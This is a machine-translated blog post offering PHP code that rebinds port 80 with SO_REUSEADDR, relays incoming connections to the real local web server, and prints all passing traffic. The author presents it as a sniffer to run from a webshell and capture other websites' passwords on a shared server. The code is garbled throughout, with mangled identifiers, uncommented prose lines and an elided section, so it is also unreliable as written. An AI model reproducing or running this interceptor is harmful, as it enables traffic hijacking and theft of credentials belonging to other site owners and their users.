Teach you how to sniff hijacked server data using PHP

Teach you how to sniff out hijacked server data using PHP

?

　　

A few days ago thorn in our maillist sent a foreigner wrote an article, the main idea is that you can use PHP to achieve data hijacking and forwarding. I took a peek, and it worked, so today I pulled out the time I used to rip it off, and I wrote a code to verify the idea. The original text of the foreigner is a PDF, interested to see can see. The address is in: http://www.secforce.co.uk/media/presentations/OWASP_Abusing_PHP_sockets.pdf. In fact, the principle of this, I remember very early Flashsky on the xfocus above through the SO_REUSEADDR implementation of the port repeatedly bound, mix also wrote a guest permission sniffer password. I am here to compare the implementation of PHP, can be used in Webshell, of course, I have not tested, I have no shell.

It is important to note that this is completely different from the previous "Port multiplexing/hijacking under PHP", which can be found here: http://www.west999.com/info/html/wangluobiancheng/ Phpbiancheng/20080224/22439.html. As for why it is different, I will not say.

The code I commented very detailed, personally think well written, do not elaborate. Here are some technical difficulties to talk about. The first is in the web, there is no multi-threading and no multi-process, but each new connection is going to be processed, what should be done? Obviously cannot be executed sequentially, because the light accept there will be blocked, and each subsequent session also needs to be dealt with separately. Fortunately, the manual found that the classic Socket_select function available, there is this to say, professional implementation of multiplexing.

The PHP code is as follows, with detailed comments. Blog post, so the code may drop something, other support I do not provide, look at the code:
Class Select
{
var $sockets;

constructor function
function Select ($sockets)
{
$this->sockets = Array ();

foreach ($sockets as $socket)
{
$this->add ($socket);
}
}

function Add ($add _socket)
{
Array_push ($this->sockets, $add _socket);
$this->sockets[] = $add _socket;
}

Use a temporary array to delete elements in an array
function Remove ($remove _socket)
{
$tmp _sockets = Array ();

foreach ($this->sockets as $socket)
{
if ($remove _socket! = $socket)
{
$tmp _sockets[] = $socket;
}
}

$this->sockets = $tmp _sockets;
}

Checks if the socket array is readable, passes the timeout, and returns the socket array
function Can_read ($timeout)
{
$read = $this->sockets;
Socket_select ($read, $write = null, $except = null, $timeout);
return $read;
}

Check if socket array is writable, incoming timeout, return socket array
function Can_write ($timeout)
{
$write = $this->sockets;
Socket_select ($read = null, $write, $except = null, $timeout);
return $write;
}
}

Web page does not time out
Set_time_limit (0);

Instant output data, no buffering
Ob_end_clean ();
Ob_implicit_flush (TRUE);

if (!isset ($_get["Listen_ip"))
{
Exit
}
if ($_get["listen_ip"] = = "")
{
Exit
}

$listen _ip = $_get["Listen_ip"];
$listen _port = 80;

Creating sockets
$listen _sock = socket_create (Af_inet, Sock_stream, sol_tcp);

Set up duplicate bindings
Socket_set_option ($listen _sock, Sol_socket, SO_REUSEADDR, 1);

Explicitly specify the binding IP address, taking precedence over the data
Socket_bind ($listen _sock, $listen _ip, $listen _port);

Start listening.
Socket_listen ($listen _sock);

echo "Listen on". Htmlentities ($listen _ip). ":". $listen _port. "
";

Create a socket array, use Select to poll
$check _socks = Array ($listen _sock);

Mapping client sockets and service-side sockets
$socket _MAPS1 the client socket as key
$socket _MAPS2 the server socket as key
Speed in memory and facilitate search below
$socket _maps1 = Array ();
$socket _maps2 = Array ();

....................................................................

while (true)
{
/*
Print_r ($socket _maps);
Print "
";
*/
Select poll, timeout 2 seconds
foreach ($select->can_read (1) as $socket)
{
Listen_sock readable, indicating that someone is connected.
if ($socket = = $listen _sock)
{
Accept the new connection and add to the rotation array
$new _client = socket_accept ($listen _sock);
$select->add ($new _client);

Socket_getpeername ($new _client, $ip, $port);
echo "New client connected: $ip, $port
";

Set up a socket to a real server
$server _sock = socket_create (Af_inet, Sock_stream, sol_tcp);
Socket_connect ($server _sock, "127.0.0.1", $listen _port);

Establish a mapping relationship between a real server socket and a real client socket
$socket _maps1[$new _client] = $server _sock;
$socket _maps2[$server _sock] = $new _client;

Add to select poll
$select->add ($server _sock);

The readable data for the $listen _sock is due to a new connection and has been processed. Temporarily removed, as the following begins processing data forwarding
Select->remove ($listen _sock);
}

Other sockets are readable, indicating that data needs to be relayed
Else
{
Reads the data, fails to from samsara the socket, and closes the socket
$client _data = @socket_read ($socket, 1024x768, php_normal_read);
if ($client _data = = = False)
{
Socket_close ($socket);
$select->remove ($socket);
echo "Client disconnected.
";

Continue
}

//If the socket is in $SOCKET_MAPS1 key, the data is read from the client
if (In_array ($socket, Array_keys ($socket _maps1)))
{
// echo "readed from client.
";
if (! Socket_write ($socket _maps1[$socket], $client _data))
{
Socket_close ($socket);
Socket_close ($so cket_maps1[$socket]);
$select->remove ($socket);
$select->remove ($socket _maps1[$socket]);
Print "Write to server error.
";
}
Print htmlentities ($client _data). "
";
}
//If the socket is in $SOCKET_MAPS2 key, the description is read from the real Web server to the data
ElseIf (In_array ($socket, Array_keys ($socket _ MAPS2)))
{
//echo "readed from server.
";
if (! Socket_write ($socket _maps2[$socket], $client _data))
{
Socket_close ($socket);
Socket_close ($so cket_maps2[$socket]);
$select->remove ($socket);
$select->remove ($socket _maps2[$socket]);
Print "Write to client error.
";
}
Print htmlentities ($client _data). "
";
}
}
}
}

?>
How does this thing work? Free to play. Maybe you have a Webshell, but you want to know the password of someone else's website on the same server ... I was tested in Windows Xp+apache, and as far as I know windows2003 is not allowed to repeat the bound port by default.

?

Detail Page: http://www.verydemo.com/demo_c116_i115729.html

